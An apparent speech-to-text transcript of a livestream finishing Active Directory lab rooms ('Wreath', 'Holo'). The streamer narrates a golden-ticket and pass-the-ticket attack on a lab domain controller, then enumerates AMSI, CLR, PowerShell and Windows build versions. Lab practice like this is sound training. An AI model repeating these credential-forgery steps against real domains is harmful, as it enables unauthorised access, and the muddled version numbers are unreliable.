make tickets sometimes, huh? KRB TGT, we got the group. Got the golden, pass the ticket, user, administrator. Not everything you needed there. What's going on here? Even though K-list isn't showing anything, I'm still going to try it. I'm still going to try a little ls slash slash DC SRV 01. .holo.live /C drive. Okay, so we can still look at them. So that's, so for some reason it's not showing us our ticket, but we definitely have, it's definitely created a ticket. So it'll tell you if it failed. So it's created that ticket, we're doing a pass the ticket, and we're able to get that, you know, onto that other machine over there. Because if I go back to Ryan, let's see, if I just go back to straight up Ryan without passing the hash and everything like that, ls slash slash DC SRV 01 dot holo dot live. That may have also been because we passed the hash, but C drive, and we should get access denied. Okay, it does not exist thing. DC SRV 01, right? That's what it's called. DC SRV 01, and say that, hey, that doesn't actually exist, so I don't know what the hell you're talking about. These two guys obviously show that it does exist, and then we can start to move through it from there, right? So we can do C drive slash scripts, and then we have that regedit.ps1. So yeah, that is what we did Wreath earlier today, and then we did finished up with Holo, and that's going to be, and then I'll just, you know, do these ones later on, I guess. What anti-malware product is deployed on? Okay, let's use why not PowerShell to see anti-malware. Is it AIM? Oh my God, is it AMSI? Is that what they're talking about? I'm pretty sure they're actually talking about AMSI. Emotional damage. What CLR version is installed? Check CLR version, PowerShell. Let's see here. I determined the install CLR version. Zuga.net. Zuga's going to let us know. The fuck did you just say? Windows PowerShell PS version table. Let's do that. And then say version. Okay, let's try that. $var equals that. So CLR version is this long ass thing. There we go. See, we'll figure it out little by little. Mine is way longer. It's just that. Okay. What PowerShell version is installed on there? I don't know. PS version, this version, like right here. Let me guess, mine's way longer again. I'm gonna go just .1 at the end there. What Windows build is PC? How do I check out the Windows build? Can't do it with host name. See Windows build PowerShell. See Windows build PowerShell. Get the Windows version PowerShell. Yes, please. Just OS version. Can we just do that in here? That'd be freaking sweet. Nah, why would we? That was a stupid idea. Get computer info? That's a good idea too. Get computer info? That's a thing? Loading hot patch information. Oh, I've actually, yeah, I've seen this one before. But definitely did this in, oh god, that's going to be freaking horrible. We just filter for the OS version, OS serial number, OS service pack, OS statuses, OS suites, OS architecture. Okay, OS architecture looks like 64-bit. That didn't really help out very much, that did it. Why do you hate me, PowerShell? Why? Try that again. Oh my god. Let's do it in even WinRM, see if we can make it a little bit better here. We'll pass the hash. No, it was get computer info, right? Okay. The OS version is that, like right there. Okay. Oof. That would have been miserable, huh? Oh, what Windows build? Windows build? Windows build. What? Windows version is 1809. Does that count for anything? Is that what we look for? What Windows build? What are you trying to find? OS info module. I mean, we did get computer info. Does that count? I think there is an OS info on here. And this is part of the OS info module. (1809) 1434. I don't know. No, that's 1, 2, 3, 4, 5. That's 5 characters long. It's definitely not that. Hey, thank you very much. 17663 1809, maybe? Is that what they're asked for? 17663.1809. Yeah, I think so. It said it was in the OS version. Thank you, Blueberry Chicken Wing. Blueberry Chicken Wing. That's what I'm talking about. I don't really know. What you asking for here, big guy? We know it's something dot something. This is our last question also. I think this is our last question too. So, what Windows build? How to find Windows version. Is that what I'm talking about with Windows build? I mean, that's kind of, I feel like that kind of has to be what it's talking about, right? Get the Windows version number. Use environment. Tech OS version. Worth knowing that the result is the same as system version. Possibly check for. Okay. I don't know what it's asking me. Because we have the version like right there. It's Windows platform Windows 32 NT. So I don't really know what it's asking me. So let's just go ahead and we already did it once, right? So how'd you get that? Oh, he did PowerShell. Well, he used seatbelt, but that's weird. That seatbelt shows that, but we're not really from 17663. So I did see. So we did say 17663. That was the other part of it. Is it 1809? Oh, I already tried that, didn't I? It's not 1809. It was 1577. Where the hell are they getting that from? I feel like we're on a newer build. Maybe that's why some of the things aren't working. Because there's nothing in here for 17763. May have just figured out why stuff isn't working properly. Alright, cool. So we have now completed that. So I put it on Twitter. What do I do with it? That's going to be it for us. And I think that's going to be it for tonight. So we completed Wreath. We completed Holo. Now I don't know what to do. Now I'm just kind of lost. Now, tomorrow or the next day, we are going to be doing the Layer 2 stuff. So I did want to hit that up. So that's I always tell you guys, yep, I am networking. So I always want, let's do some networking tomorrow night, and we'll hit up the Layer 2 stuff. Look at that. We have one day of access left too. Look at that, huh? So, oh man, that's going to be it. Thanks for watching. Thanks for sticking around and everything. Let's go ahead and check out who else is streaming. InfoSec streams, right? Let's see how this guy's doing. Just drop everyone into whoever has less, I guess. Be nice to me, right? What are you doing? Probably doing something cool. Okay, that's not in English, and I'm speaking English, and people are watching me out here, so I'm going to go with you guys want English at least. Are you speaking English? Alright, Painful IT, the most painful channel. Alright. So, this guy looks like he is Python study. Okay, cool. Actually, I've watched this guy before. He's actually really good. So let's go ahead and we will do a raid over there. And we'll call it a day, right? We'll go ahead and we'll raid him. And yeah, you guys have a good one. Thanks a lot for sticking around. Thanks a lot for watching. As always.